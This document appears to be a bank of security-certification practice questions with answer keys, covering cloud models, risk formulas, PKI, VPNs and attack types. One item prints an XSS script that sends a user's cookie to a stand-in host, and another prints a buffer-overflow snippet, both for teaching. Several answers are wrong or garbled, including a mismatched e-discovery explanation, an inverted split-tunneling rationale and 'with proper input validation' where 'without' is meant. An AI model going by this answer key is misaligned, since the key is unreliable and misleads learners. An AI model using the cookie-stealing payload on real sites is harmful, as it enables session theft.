Your company is determining what data to make accessible in the new cloud-based collaboration solution. Which of the following types of information should not be stored in a public cloud-based collaboration solution? a. price lists b. financial data c. catalogues d. company forms

B. Explanation: The following types of information should not be stored in a public cloud-based solution: Image Credit card information Image Trade secrets Image Financial data Image Health records Image State and federal government secrets Image Proprietary or sensitive data Image Personally identifiable information

ACLs are susceptible to what type of attack? a. MAC spoofing b. IP spoofing c. whaling d. DNS poisoning

B. Explanation: The inherent limitation of ACLs is their inability to detect whether IP spoofing is occurring. IP address spoofing is a technique hackers use to hide their trail or to masquerade as another computer. A hacker alters the IP address as it appears in a packet to attempt to allow the packet to get through an ACL that is based on IP addresses.

Which of the following describes the average amount of time it will take to get a device fixed and back online? a. MTBF b. MTTR c. RTO d. RPO

B. Explanation: The mean time to repair (MTTR) describes the average amount of time it will take to get a device fixed and back online.

What is the primary concern of PII? a. availability b. confidentiality c. integrity d. authentication

B. Explanation: The primary concern of PII is confidentiality.

During the design of a new application, the programmers need to determine the performance and security impact of the new application on the enterprise. Who should collaborate with the programmers to determine this information? a. database administrator b. network administrator c. executive management d. physical security manager

B. Explanation: The programmers should collaborate with the network administrator to determine the performance and security impact of the new application on the enterprise.

Which of the following cloud approaches offers the maximum control over company data? a. public b. private c. hybrid d. composite

B. Explanation: There is a trade-off when a decision must be made between the two architectures. A private solution provides the most control over the safety of your data but also requires staff and knowledge to deploy, manage, and secure the solution.

What attack is illustrated in the following output? Click here to view code image <SCRIPT> document.location='http://site.comptia/cgi-bin/script. cgi?'+document.cookie </SCRIPT> a. insecure direct object references b. XSS c. CSRF d. click-jacking

B. Explanation: This particular XSS example is designed to steal a cookie from an authenticated user.

Which of the following is a logical division of a storage area network? a. VLAN b. VSAN c. Mask d. iSCSI

B. Explanation: Virtual storage area networks (VSANs) are logical divisions of a storage area network, much like a VLAN is a logical subdivision of a local area network. They provide separation between sections of a SAN.

What port number does HTTPS use? a. 80 b. 443 c. 23 d. 69

B. Explanation: When HTTPS is used, port 80 is not used. Rather, it uses port 443.

Your organization just deployed an enterprise instant messaging solution. The CIO is concerned about the transfer of worms, Trojans, and other malware through the IM connections. Which of the following would not be a measure that could help mitigate the introduction of malware through the IM system? a. Disable the ability to transfer files through the system. b. Purchase a product that performs encryption. c. Install an antimalware product that can plug into the IM client. d. Train users in the dangers of using IM.

B. Explanation: While encryption would help prevent data leakage, it would do nothing to stop the introduction of malware through the IM connection.

Your users use a VPN connection to connect to the office for web conferences. Several users have complained about poor performance during the meetings. Which of the following actions could help improve the performance of the video conference for all participants without reducing security? a. Change the encryption used from AES to DES. b. Disable split tunneling. c. Enable read/write desktop mode. d. Change the hashing algorithm to SHA-1.

B. Explanation: While split tunneling allows access to the LAN and the Internet at the same time, it reduces the amount of bandwidth available to each session. You can provide better performance for the participants by disallowing split tunneling on the VPN concentrator.

After experiencing several security issues in the past year, management at your organization has adopted a plan to periodically assess its information security awareness. You have been asked to lead this program. Which program are you leading? a. security training b. continuous monitoring c. risk mitigation d. threat identification

B. Explanation: You are leading the continuous monitoring program, which will periodically assess its information security awareness. A security training program designs and delivers security training at all levels of the organization. A risk mitigation program attempts to identify risks and select and deploy mitigating controls. A threat identification identifies all threats to an organization as part of risk management.

After analyzing an attack that was successful against several of your organization's servers, you come up with five possible solutions that could prevent the type of attack that occurred. You need to implement the solution that will provide the best protection against this attack while minimizing the impact on the servers' performance. You decide to test the solutions in your organization's virtual lab. What should you do? a. Implement all five solutions in the virtual lab and collect metrics on the servers' performance. Run a simulation for the attack in the virtual lab. Choose which solutions to implement based on the metrics collected. b. Implement each solution one at a time in the virtual lab. Run a simulation for the attack in the virtual lab. Collect metrics on the servers' performance. Roll back each solution and implement the next solution, repeating the process for each solution. Choose which solutions to implement based on the metrics collected. c. Implement all five solutions in the virtual lab. Run a simulation for the attack in the virtual lab. Collect metrics on the servers' performance. Choose which solutions to implement based on the metrics collected. d. Implement each solution one at a time in the virtual lab and collect metrics on the servers' performance. Run a simulation for the attack in the virtual lab. Roll back each solution and implement the next solution, repeating the process for each solution. Choose which solutions to implement based on the metrics collected.

B. Explanation: You should implement each solution one at a time in the virtual lab, run a simulation for the attack in the virtual lab, collect the metrics on the servers' performance, roll back each solution, implement the next solution, and repeat the process for each solution. Then you should choose which solutions to implement based on the metrics collected. Each solution should be tested in isolation, without the other solutions being deployed. You should run the simulation for the attack in the virtual lab before collecting metrics on the servers' performance.

Your organization has recently been the victim of fraud perpetuated by a single employee. After a thorough analysis has been completed of the event, security experts recommend that security controls be established that will require multiple employees to complete a task. Which control should you implement, based on the expert recommendations? a. mandatory vacation b. separation of duties c. least privilege d. continuous monitoring

B. Explanation: You should implement separation of duties, a security control that requires multiple employees to complete a task.

As a security analyst for your organization, you have implemented several new security controls. Management requests that you analyze the availability of several devices and provide them with the appropriate metrics. Which metrics should you provide? a. ROI and TCO b. MTTR and MTBF c. WRT and RPO d. baselines and benchmarks

B. Explanation: You should provide mean time to repair (MTTR) and mean time between failures (MTBF) to provide management with metrics regarding availability.

Recently, sales people within your organization are having trouble managing customer-related data. Management is concerned that sales figures are being negatively affected as a result of this mismanagement. You have been asked to provide a suggestion to fix this problem. What should you recommend? a. Deploy an ERP solution. b. Deploy a CRM solution. c. Deploy a GRC solution. d. Deploy a CMS solution.

B. Explanation: You should recommend customer relationship management (CRM), which identifies customers and stores all customer-related data, particularly contact information and data on any direct contact with customers.

To improve the security of products providing presence information, which protocol could you use? a. SPF b. XMPP c. SPIT d. SKRT

B. Explanation: You want to select a product that uses a secure protocol. One example is Extensible Messaging and Presence Protocol (XMPP) over TLS.

Your company performs a full backup on Mondays and a differential backup on all other days. You need to restore the data to the state it was in on Thursday. How many backups will you need to restore? a. one b. two c. three d. four

B. Explanation: You will need to restore two backups: Monday's full backup and Thursday's differential backup.

You have been hired as a security analyst for your organization. As your first job duties, you have been asked to identify new physical controls that should be implemented by your organization. Which of the following controls should you identify? (Choose all that apply.) a. separation of duties b. encryption c. biometrics d. guards

C, D. Explanation: Biometrics and guards are physical controls. Physical controls are implemented to protect an organization's facilities and personnel.

Recently, your organization has been the victim of several client-side attacks. Management is very concerned and wants to implement some new policies that could negatively impact your business. You explain to management some of the measures that should be taken to protect against these attacks. Management asks why client-side attacks are increasing. What should be your reply? (Choose all that apply.) a. Servers are more expensive than clients. b. Client computers cannot be protected as well as servers. c. Client computers are not usually as protected as servers. d. There are more clients than servers.

C, D. Explanation: You should give the following reasons for the increase in client-side attacks: Image Client computers are not usually as protected as servers. Image There are more clients than servers.

Your organization implements a public key infrastructure (PKI) to issue digital certificates to users. Management has requested that you ensure that all the digital certificates that were issued to contractors have been revoked. Which PKI component should you consult? a. CA b. RA c. CRL d. OCSP

C. Explanation: A CRL contains a list of all the certificates that have been revoked. A CA is the entity that creates and signs digital certificates, maintains the certificates, and revokes them when necessary. An RA verifies the requestor's identity, registers the requestor, and passes the request to the CA. The OCSP is an Internet protocol that obtains the revocation status of an X.509 digital certificate.

Which cloud solution can reduce costs to the participating organizations? a. diversified b. hybrid c. community d. private

C. Explanation: A community cloud is shared by organizations that are addressing a common need, such as regulatory compliance. Such shared clouds may be managed by either a cross-company team or a third-party provider. This can be beneficial to all participants because it can reduce the overall cost to each organization.

Your company is examining its password polices and would like to require passwords that include a mixture of upper- and lowercase letters, numbers, and special characters. What type of password does this describe? a. standard word password b. combination password c. complex password d. passphrase password

C. Explanation: A complex password includes a mixture of upper- and lowercase letters, numbers, and special characters. For many organizations today, this type of password is enforced as part of the organization's password policy. An advantage of this type of password is that it is very hard to crack. A disadvantage is that it is harder to remember and can often be much harder to enter correctly.

Your organization recently obtained a contract with the U.S. Department of Defense (DoD). As part of this contract, your organization will be exchanging confidential data with the DoD. Management has requested that you implement the most secure encryption scheme available for these data exchanges. Which scheme should you implement? a. concealment cipher b. symmetric algorithm c. one-time pad d. asymmetric algorithm

C. Explanation: A one-time pad is the most secure encryption scheme because it is used only once.

A packet containing a long string of no-operation instructions (NOPs) followed by a command usually indicates what type of attack? a. XSS b. CSRF c. buffer overflow d. Bluejacking

C. Explanation: A packet containing a long string of NOPs followed by a command usually indicates a type of buffer overflow attack called an NOP slide. The purpose is to get the CPU to locate where a command can be executed.

You have been hired as a security practitioner for an organization. You ask the network administrator for any network diagrams that are available. Which network diagram would give you the most information? a. logical network diagram b. wireless network diagram c. physical network diagram d. DMZ diagram

C. Explanation: A physical network diagram would give you the most information. A physical network diagram shows the details of physical communication links, such as cable length, grade, and wiring paths; servers, with computer name, IP address (if static), server role, and domain membership; device location, such as printer, hub, switch, modem, router, or bridge, as well as proxy location; communication links and the available bandwidth between sites; and the number of users, including mobile users, at each site.

Which of the following is a cloud solution owned and managed by one company solely for that companies use? a. hybrid b. public c. private d. community

C. Explanation: A private cloud is a solution owned and managed by one company solely for that company's use. This provides the most control and security but also requires the biggest investment in both hardware and expertise.

An organization has a research server farm with a value of $12,000. The exposure factor for a complete power failure is 10%. The annualized rate of occurrence that this will occur is 5%. What is the ALE for this event? a. $1,200 b. $12,000 c. $60 d. $600

C. Explanation: ALE = SLE × ARO = $1,200 × 5% = $60 SLE = AV × EF = $12,000 × 10% = $1,200

A user reports that his mouse is moving around on the screen without his help, and files are opening. An IT technician determines that the user's computer is being remotely controlled by an unauthorized user. What should he do next? a. Remediate the computer to ensure that the incident does not occur again. b. Recover the computer from the incident by restoring all the files that were deleted or changed. c. Respond to the incident by stopping the remote desktop session. d. Report the incident to the security administrator.

C. Explanation: After detecting the attack, the IT technician should respond to the incident by stopping the remote desktop session. The steps in incident response are as follows: 1. Detect the incident. 2. Respond to the incident. 3. Report the incident to the appropriate personnel. 4. Recover from the incident. 5. Remediate all components affected by the incident to ensure that all traces of the incident have been removed. 6. Review the incident and document all findings.

Which of the following statements regarding the security requirements and responsibilities for personnel is true? a. Only management and senior staff will have security requirements and responsibilities. b. Although executive management is responsible for leading any security initiative, executive management is exempt from most of the security requirements and responsibilities. c. All personnel within an organization will have some level of security requirements and responsibilities. d. Only the physical security manager should be concerned with the organization's physical security.

C. Explanation: All personnel within an organization will have some level of security requirements and responsibilities.

Which DAM architecture uses a sensor attached to the database and continually polls the system to collect the SQL statements as they are being performed? a. interception-based model b. log-based model c. memory-based model d. signature-based model

C. Explanation: Among the architectures used are: Image Interception-based model: Watches the communication between the client and the server Image Memory-based model: Uses a sensor attached to the database and continually polls the system to collect the SQL statements as they are being performed. Image Log-based model: Analyzes and extract information from the transaction logs

Your organization has signed a new contract to provide database services to another company. The partner company has requested that the appropriate privacy protections be in place within your organization. Which document should be used to ensure data privacy? a. ISA b. IA c. NDA d. PII

C. Explanation: An NDA should be used to ensure data privacy.

Over the past several months, your organization's network has been under a password attack. The attack has been carried out from different computers throughout the United States. Which type of attack is being carried out? a. client-side attack b. end-user attack c. advanced persistent threat d. zero-day attack

C. Explanation: An advanced persistent threat (APT) is being carried out. An APT is carried out over a long period of time and targets a specific entity.

In what type of web attack does the website think that a request came from the user's browser and is made by the user himself, when actually the request was planted in the user's browser? a. insecure direct object references b. XSS c. CSRF d. Click jacking

C. Explanation: Cross-Site Request Forgery (CSRF) is an attack that causes an end user to execute unwanted actions on a web application in which he or she is currently authenticated. Unlike with XSS, in CSRF, the attacker exploits the website's trust of the browser rather than the other way around. The website thinks that the request came from the user's browser and is made by the user when actually the request was planted in the user's browser.

You are working with a project team to deploy several new firewalls. The initiation stage is complete, and now the team is engaged in the acquisition stage. Which step should the team complete as part of this stage? a. Provide security categories for the new routers. b. Test the routers for security resiliency. c. Design the security architecture. d. Update the routers with the latest updates from the vendor.

C. Explanation: During the acquisition stage, you should design the security architecture.

Which of the following is not a single protocol but a framework for port-based access control? a. PAP b. CHAP c. EAP d. RDP

C. Explanation: Extensible Authentication Protocol (EAP) is not a single protocol but a framework for port-based access control that uses the same three components that are used in RADIUS.

Your company implements one of its applications on a Linux server. You would like to store passwords in a location that can be protected using a hash. Where is this location? a. /etc/passwd b. /etc/passwd/hash c. /etc/shadow d. /etc/root

C. Explanation: For Linux, passwords are stored in the /etc/passwd or /etc/shadow file. Because the /etc/passwd file is a text file that can be easily accessed, you should ensure that any Linux servers use the /etc/shadow file where the passwords in the file can be protected using a hash.

Generally speaking, an increase in security measures in a network is accompanied by what? a. an increase in performance b. an increased ease of use c. a decrease in performance d. a decrease in security

C. Explanation: It's a well-known fact that security measures negatively affect both network performance and ease of use for users. With this in mind, the identification of situations where certain security measures (such as encryption) are required and where they are not required is important. Eliminating unnecessary measures can both enhance network performance and reduce complexity for users.

Performing LUN masking at the _______ level is the most secure. a. server b. HBA c. storage controller d. port

C. Explanation: LUN masking can be done at either the host bus adapter (HBA) level or at the storage controller level. Using it at the storage controller level provides greater security because it is possible to defeat LUN masking at the HBA level by forging either an IP address, MAC address, or World Wide Name.

You need to identify zero-day malware. What technique could be used to help in this process? a. fuzzing b. deploying an HTTP interceptor c. malware sandboxing d. establishing a social media policy

C. Explanation: Malware sandboxing aims at detecting malware code by running it in a computer-based system of one type or another to analyze it for behavior and traits indicative of malware. One of its goals is to spot zero-day malware—that is, malware that has not yet been identified by commercial antimalware systems and therefore does not yet have a cure.

For what type of systems was NFS developed? a. Windows b. Novell c. UNIX d. Mac

C. Explanation: NFS was developed for use with UNIX and Linux-based systems, while CIFS is a public version of Server Message Block (SMB), which was invented by Microsoft.

Which implementation of DLP is installed at network egress points? a. imprecise b. precise c. network d. endpoint

C. Explanation: Network DLP is installed at network egress points near the perimeter. It analyzes network traffic.

Recently your users were redirected to a malicious site when their DNS cache was polluted. What type of attack have you suffered? a. phishing b. shoulder surfing c. pharming d. dumpster diving

C. Explanation: Pharming is similar to phishing, but pharming actually pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site.

During the design of the new data center, several questions arise as to the use of raised flooring and dropped ceiling that are part of the blueprint. Which personnel are most likely to provide valuable information in this area? a. database administrator and facilities manager b. database administrator and physical security manager c. facilities manager and physical security manager d. emergency response team and facilities manager

C. Explanation: The facilities manager and physical security manager are most likely to provide valuable information in this area.

Which of the following is not a part of hardening an OS? a. Unnecessary applications should be removed. b. Unnecessary services should be disabled. c. Unrequired ports should be opened. d. External storage devices and media should be tightly controlled.

C. Explanation: The following are all components of hardening an OS: Image Unnecessary applications should be removed. Image Unnecessary services should be disabled. Image Unrequired ports should be blocked.

A security analyst is using the SCinformation system = [(confidentiality, impact), (integrity, impact), (availability, impact)] formula while performing risk analysis. What will this formula be used for? a. to calculate quantitative risk b. to calculate ALE c. to calculate the aggregate CIA score d. to calculate SLE

C. Explanation: The formula given in the scenario is used to calculate the aggregate CIA score. To calculate ALE, you should multiply the SLE × ARO. To calculate SLE, you should multiply AV × EF. Quantitative risk involves using SLE and ALE.

The data owner has determined all the data classifications of the data he owns. He determines the level of access that will be granted to users. Who should be responsible for implementing the controls? a. data owner b. data custodian c. data owner's supervisor d. security specialist

C. Explanation: The primary reason for having an e-discovery process is to provide evidence in a digital investigation.

You are the security analyst for your enterprise. You have been asked to make several security controls easier to implement and manage. Which attribute will you be addressing? a. maintainability b. availability c. usability d. recoverability

C. Explanation: Usability means making a security solution or device easier to use and matching the solution or device more closely to organizational needs and requirements.

Senior management at your organization has implemented a policy which states that best practice documentation must be created for all security personnel. Which of the following is a valid reason for this documentation? a. Using this documentation will ensure that the organization will not have any legal issues due to security. b. Using this documentation will ensure that the organization will not have any security breaches. c. Using this documentation will allow security personnel to ensure that they know what to do according to industry standards. d. Using this documentation will ensure that security personnel are properly trained.

C. Explanation: Using best practice documentation will allow security personnel to ensure that they know what to do according to industry standards.

The organization is planning the deployment of a VoIP phone system. During the risk analysis, which of the following is not a valid consideration? a. increased threat of snooping in VoIP b. increased threat of theft of service c. access through unsecured maintenance ports on the PBX d. Increased threat of DoS attacks

C. Explanation: VoIP systems do not use the PBX.

You have been hired as a security analyst for your company. Recently, several assets have been marked to be removed from the enterprise. You need to document the steps that should be taken in relation to security. Which of the following guidelines should be implemented? a. Deploy the appropriate security controls on the asset. b. Deploy the most recent updates for the asset. c. Back up all the data on the asset and ensure that the data is completely removed. d. Shred all the hard drives in the asset.

C. Explanation: When decommissioning an asset, you should back up all the data on the asset and ensure that the data is completely removed. You should shred all the hard drives in the asset only if you are sure you will not be reusing the asset or if the hard drives contain data of the most sensitive nature.

Your company is planning to procure a web conferencing system to cut costs on travel. You have been asked to investigate the security issues that should be considered during this process. Which of the following is not an issue to consider? a. Preventing uninvited guests at meetings b. The dangers of data being stored on a vendor's shared server c. The potential for the solution to affect network performance d. The possibility of information being captured during transmission

C. Explanation: While network performance may be a consideration in the selection of a product, it is the only issue listed here that is not a security issue.

The chief information security officer (CISO) has asked you to prepare a report for management that includes the overall costs associated with running the organizational risk management process, including insurance premiums, finance costs, administrative costs, and any losses incurred. What are you providing? a. ROI b. SLE c. TCO d. NPV

C. Explanation: You are providing the total cost of ownership (TCO). Return on investment (ROI) refers to the money gained or lost after an organization makes an investment. Single loss expectancy (SLE) is the monetary impact of each threat occurrence. Net present value (NPV) is a type of ROI calculation that compares ALE against the expected savings as a result of an investment and considers the fact that money spent today is worth more than savings realized tomorrow.

Your organization has implemented a virtual private network (VPN) that allows branch offices to connect to the main office. Recently, you have discovered that the key used on the VPN has been compromised. You need to ensure that the key is not compromised in the future. What should you do? a. Enable PFS on the main office end of the VPN. b. Implement IPsec on the main office end of the VPN. c. Enable PFS on the main office and branch offices' ends of the VPN. d. Implement IPsec on the main office and branch offices' ends of the VPN.

C. Explanation: You should enable perfect forward secrecy (PFS) on the main office and branch offices' ends of the VPN. PFS increases the security for a VPN because it ensures that the same key will not be generated by forcing a new key exchange. PFS ensures that a session key created from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future. PFS depends on asymmetric or public key encryption. If you implement PFS, disclosure of the long-term secret keying information that is used to derive a single key does not compromise the previously generated keys. You should not implement IPsec because it does not protect against key compromise. While it does provide confidentiality for the VPN connection, the scenario specifically states that you needed to ensure that the key is not compromised.

1. Your organization has decided that it needs to protect all confidential data that is residing on a file server. All confidential data is located within a folder named Confidential. You need to ensure that this data is protected. What should you do? a. Implement hashing for all files within the Confidential folder. b. Decrypt the Confidential folder and all its contents. c. Encrypt the Confidential folder and all its contents. d. Implement a digital signature for all the users that should have access to the Confidential folder.

C. Explanation: You should encrypt the folder and all its contents. Hashing reduces a message to a hash value. Hashing is a method for determining whether the contents of a file have been changed. But hashing does not provide a means of protecting data from editing. Decryption converts ciphertext into plaintext. A digital signature is an object that provides sender authentication and message integrity by including a digital signature with the original message.

During a recent security analysis, you determine that users do not use authentication when accessing some private data. What should you do first? a. Encrypt the data. b. Configure the appropriate ACL for the data. c. Determine whether authentication can be used. d. Implement complex user passwords.

C. Explanation: You should first determine whether authentication can be used. Users should use authentication when accessing private or confidential data.

Your organization wants to deploy a new security control on its network. However, management has requested that you provide information on whether the security control will add value to the organization after its deployment. What should you do to provide this information to management? a. Deploy the security control and collect the appropriate metrics for reporting to management. b. Deploy the security control and create baselines for reporting to management. c. Perform a cost/benefit analysis for the new security control. d. Prototype the new solution in a lab environment and provide the prototype results to management.

C. Explanation: You should perform a cost/benefit analysis for the new security control before deploying the control.

Which of the following is not a component of 802.1x authentication? a. supplicant b. authenticator c. authentication server d. KDC

D. Explanation: 802.1x is a standard that defines a framework for centralized port-based authentication. It can be applied to both wireless and wired networks and uses three components: Image Supplicant: The user or device requesting access to the network Image Authenticator: The device through which the supplicant is attempting to access the network Image Authentication server: The centralized device that performs authentication

Your organization has recently become the victim of an attack against a cryptographic algorithm. The particular attack used all possible keys until a key is discovered that successfully decrypts the ciphertext. Which type of attack occurred? a. frequency analysis b. reverse engineering attack c. ciphertext-only attack d. brute-force attack

D. Explanation: A brute-force attack executed against a cryptographic algorithm uses all possible keys until a key is discovered that successfully decrypts the ciphertext. A frequency analysis attack relies on the fact that substitution and transposition ciphers will result in repeated patterns in ciphertext. A reverse engineering attack occurs when an attacker purchases a particular cryptographic product to attempt to reverse engineer the product to discover confidential information about the cryptographic algorithm used. A ciphertext-only attack uses several encrypted messages (ciphertext) to figure out the key used in the encryption process.

Your organization is planning the deployment of a biometric authentication system. You would like a method that records the peaks and valleys of the hand and its shape. Which physiological biometric system performs this function? a. fingerprint scan b. finger scan c. hand geometry scan d. hand topography

D. Explanation: A hand topography scan records the peaks and valleys of the hand and its shape. This system is usually implemented in conjunction with hand geometry scans because hand topography scans are not unique enough if used alone.

Your organization has recently decided to implement encryption on the network. Management requests that you implement a system that uses a private or secret key that must remain secret between the two parties. Which system should you implement? a. running key cipher b. concealment cipher c. asymmetric algorithm d. symmetric algorithm

D. Explanation: A symmetric algorithm uses a private or secret key that must remain secret between the two parties. A running key cipher uses a physical component, usually a book, to provide the polyalphabetic characters. A concealment cipher occurs when plaintext is interspersed somewhere within other written material. An asymmetric algorithm uses both a public key and a private or secret key.

Which of the following is not an example of de-perimiterization? a. telecommuting b. cloud computing c. BYOD d. three-legged firewall

D. Explanation: A three-legged firewall is an example of traditional perimiterization. Examples of de-perimiterization include telecommuting, cloud computing, "bring your own device" (BYOD), and outsourcing.

Which of the following is not a biometric system based on behavioral characteristics? a. signature dynamics b. keystroke dynamics c. voice pattern or print d. vascular scan

D. Explanation: A vascular scan scans the pattern of veins in the user's hand or face. It is based on physiological characteristics rather than behavioral characteristics. While this method can be a good choice because it is not very intrusive, physical injuries to the hand or face, depending on which the system uses, could cause false rejections.

The application development team of your organization has released a new version of an application today. Within hours, popular hacker forums have several posts regarding a security vulnerability in the application. Which type of attack does this indicate? a. client-side attack b. end-user attack c. advanced persistent threat d. zero-day attack

D. Explanation: A zero-day attack occurs when a security vulnerability in an application is discovered on the same day the application is released.

Your organization has decided to formally adopt a change management process. You have been asked to design the process. Which of the following guidelines should be part of this new process? a. Only critical changes should be fully analyzed. b. After formal approval, all costs and effects of implementation should be reviewed. c. Change steps should be developed only for complicated changes. d. All changes should be formally requested.

D. Explanation: All changes should be formally requested. The following are some change management guidelines: Image Each request should be analyzed to ensure that it supports all goals and polices. Image Prior to formal approval, all costs and effects of the methods of implementation should be reviewed. Image After they're approved, the change steps should be developed. Image During implementation, incremental testing should occur, relying on a predetermined fallback strategy, if necessary. Image Complete documentation should be produced and submitted with a formal report to management.

You have been asked to participate in the deployment of a new firewall. The project has just started and is still in the initiation stage. Which step should be completed as part of this stage? a. Develop security controls. b. Assess the system security. c. Ensure information preservation. d. Assess the business impact of the system.

D. Explanation: As part of the initiation stage, you should assess the business impact of the system.

Which of the following concepts provides evidence about a target to an appraiser so the target's compliance with some policy can be determined before access is allowed? a. identity propagation b. authentication c. authorization d. attestation

D. Explanation: Attestation provides evidence about a target to an appraiser so the target's compliance with some policy can be determined before allowing access.

Management expresses concerns about using multi-tenant public cloud solutions to store organizational data. You explain that tenant data in a multi-tenant solution is quarantined from other tenants' data using a tenant ID in the data labels. What is this condition referred to? a. data remnants b. data aggregation c. data purging d. data isolation

D. Explanation: Data isolation ensures that tenant data in a multi-tenant solution is isolated from other tenants' data via a tenant ID in the data labels.

A web application developed by your company was recently compromised and caused the loss of sensitive data. You need a tool that can help identify security holes in the application before it is redeployed. Which tool could you use? a. port scanner b. protocol analyzer c. password cracker d. fuzzer

D. Explanation: Fuzzers are software tools that find and exploit weaknesses in web applications.

Which component of IPsec provides the authentication material used to create the keys exchanged during peer authentication? a. AH b. ESP c. ISAKMP d. IKE

D. Explanation: IPsec is actually a suite of protocols, in the same way that TCP/IP is. It includes the following components: Image Authentication Header (AH): AH provides data integrity, data origin authentication, and protection from replay attacks. Image Encapsulating Security Payload (ESP): ESP provides all that AH does as well as data confidentiality. Image Internet Security Association and Key Management Protocol (ISAKMP): ISAKMP handles the creation of a security association for the session and the exchange of keys. Image Internet Key Exchange (IKE): Also sometimes referred to as IPsec Key Exchange, IKE provides the authentication material used to create the keys exchanged by ISAKMP during peer authentication. This was proposed to be performed by a protocol called Oakley that relied on the Diffie-Hellman algorithm, but Oakley has been superseded by IKE.

In which of the following is the storage network the same network as the client network? a. SAN b. VSAN c. WAN d. NAS

D. Explanation: In NAS, almost any machine that can connect to the LAN (or is interconnected to the LAN through a WAN) can use protocols such as NFS, CIFS, or HTTP to connect to a NAS and share files.

You implemented a procedure whereby a testing team was provided with limited knowledge of the network systems and devices using publicly available information. The organization's security team was informed that an attack is coming. What type of test have you implemented? a. double-blind test b. target test c. full-knowledge test d. blind test

D. Explanation: In a blind test, the testing team is provided with limited knowledge of the network systems and devices using publicly available information. The organization's security team knows that an attack is coming. This test requires more testing team effort than the other test options.

The following is what type of attack? Click here to view code image #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf,code); a. XSS b. CSRF c. SQL injection d. buffer overflow

D. Explanation: In this example of a buffer overflow, 16 characters are being sent to a buffer that is only 8 bytes. With proper input validation, this will cause an access violation.

Which of the following is not one of the three listed threat actors as listed by the FBI? a. organized crime groups b. state sponsors c. terrorists groups d. natural disasters

D. Explanation: Natural disasters are not listed as one of the three threat actors by the FBI.

Which of the following is not a valid IPv6 address? a. 2001:0db8:85a3:0000:0000:8a2e:0370:7334 b. 2001:0db8:85a3:0:0:8a2e:0370:7334 c. 2001:0db8:85a3::8a2e:0370:7334 d. 2001::85a3:8a2e::7334

D. Explanation: One or more consecutive sections with only a 0 can be represented with a single empty section (double colons), but this technique can be applied only once.

Management at your organization has decided that it no longer wants to implement asymmetric algorithms because they are much more expensive to implement. You have determined that several algorithms are being used across the enterprise. Which of the following should you discontinue using, based on management's request? a. IDEA b. Twofish c. RC6 d. RSA

D. Explanation: RSA is an asymmetric algorithm and should be discontinued because of management's request to no longer implement asymmetric algorithms. All the other algorithms listed here are symmetric algorithms.

Which technology uses chips and receivers to manage inventory? a. geolocation b. geotagging c. SRTM d. RFID

D. Explanation: Radio frequency identification (RFID) uses chips and receivers to manage inventory.

You have been asked to document the different threats to an internal file server. As part of that documentation, you need to include the monetary impact of each threat occurrence. What should you do? a. Determine the ARO for each threat occurrence. b. Determine the ALE for each threat occurrence. c. Determine the EF for each threat occurrence. d. Determine the SLE for each threat occurrence.

D. Explanation: SLE indicates the monetary impact of each threat occurrence. ARO is the estimate of how often a given threat might occur annually. ALE is the expected risk factor of an annual threat event. EF is the percent value or functionality of an asset that will be lost when a threat event occurs.

You are analyzing a group of threat agents that includes hardware and software failure, malicious code, and new technologies. Which type of threat agents are you analyzing? a. human b. natural c. environmental d. technical

D. Explanation: Technical threat agents include hardware and software failure, malicious code, and new technologies. Human threat agents include both malicious and non-malicious insiders and outsiders, terrorists, spies, and terminated personnel. Natural threat agents include floods, fires, tornadoes, hurricanes, earthquakes, or other natural disaster or weather event. Environmental threat agents include power and other utility failure, traffic issues, biological warfare, and hazardous material issues (such as spillage).

Which IPv4-to-IPv6 transition mechanisms assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6 hosts are located behind IPv4 network address translators? a. GRE tunnels b. 6 to 4 c. dual stack d. Teredo

D. Explanation: Teredo assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6 hosts are located behind IPv4 network address translators (NATs).

What is considered the primary crime scene during a digital attack? a. the first internal organization device that the attacker encounters b. the path on which the attack is carried out c. the system or device from which the attacker is carrying out the attack d. the system or device being attacked

D. Explanation: The primary crime scene during a digital attack is the system or device being attacked. All the other devices are considered as part of the evidence trail but are not primary crime scenes.

Your organization has recently undergone a major restructure. During this time, a new chief security officer (CSO) was hired. He has asked you to make recommendations for the implementation of organizational security policies. Which of the following should you not recommend? a. All personnel are required to use their vacation time. b. All personnel should be cross-trained and should rotate to multiple positions throughout the year. c. All high-level transactions should require a minimum of two personnel to complete. d. The principle of least privilege should only be implemented for all high-level positions.

D. Explanation: The principle of least privilege should be implemented for all positions, not just high-level positions.

Which statement is not true regarding an organization's sales staff? a. The sales staff is rarely concerned with organizational security. b. The sales staff has unique security issues. c. The sales staff will often use publicly available Internet connections. d. The sales staff's devices are rarely targets of attackers.

D. Explanation: The sales staff's devices are often targets for attackers.

What is the last step in performing a penetration test? a. Gather information about attack methods against the target system or device. b. Document information about the target system or device. c. Execute attacks against the target system or device to gain user and privileged access. d. Document the results of the penetration test and report the findings.

D. Explanation: The steps in performing a penetration test are as follows: 1. Document information about the target system or device. 2. Gather information about attack methods against the target system or device. 3. Identify the known vulnerabilities of the target system or device. 4. Execute attacks against the target system or device to gain user and privileged access. 5. Document the results of the penetration test and report the findings to management, with suggestions for remedial action.

Your organization has established a new security metrics policy to be more proactive in its security measures. As part of the policy, you have been tasked with collecting and comparing metrics on a day-to-day basis. Which process are you performing? a. thresholds b. trends c. baselines d. daily workloads

D. Explanation: When you are collecting and comparing metrics on a day-to-day basis, you are performing daily workloads.

Your organization has recently started allowing sales people to access internal resources remotely. Management wants you to configure the appropriate controls to provide maximum security for these connections. What should you do? a. Deploy a DMZ. b. Deploy a VLAN. c. Deploy a wireless network. d. Deploy a VPN.

D. Explanation: You should deploy a virtual private network (VPN) to allow sales people to access internal resources remotely.

Which of the following should not be taken into consideration for e-discovery purposes when a legal case is presented to a company? a. data ownership b. data retention c. data recovery d. data size

D. Explanation: You should not consider data size when a legal case is presented to a company. In e-discovery, you should consider inventory and asset control, data retention policies, data recovery and storage, data ownership, data handling, and legal holds.

After a recent attack, senior management at your organization asked for a thorough analysis of the attack. After providing the results of the analysis to senior management, requests were made to the IT department on several new security controls that should be deployed. After deploying one of the controls, the network is now experiencing a higher latency value. What should you do? a. Do nothing. High latency is desirable. b. Remove the new security control. c. Edit the security control to increase the latency. d. Report the issue to senior management to find out if the higher latency value is acceptable.

D. Explanation: You should report the issue to senior management to find out if the higher latency value is acceptable.

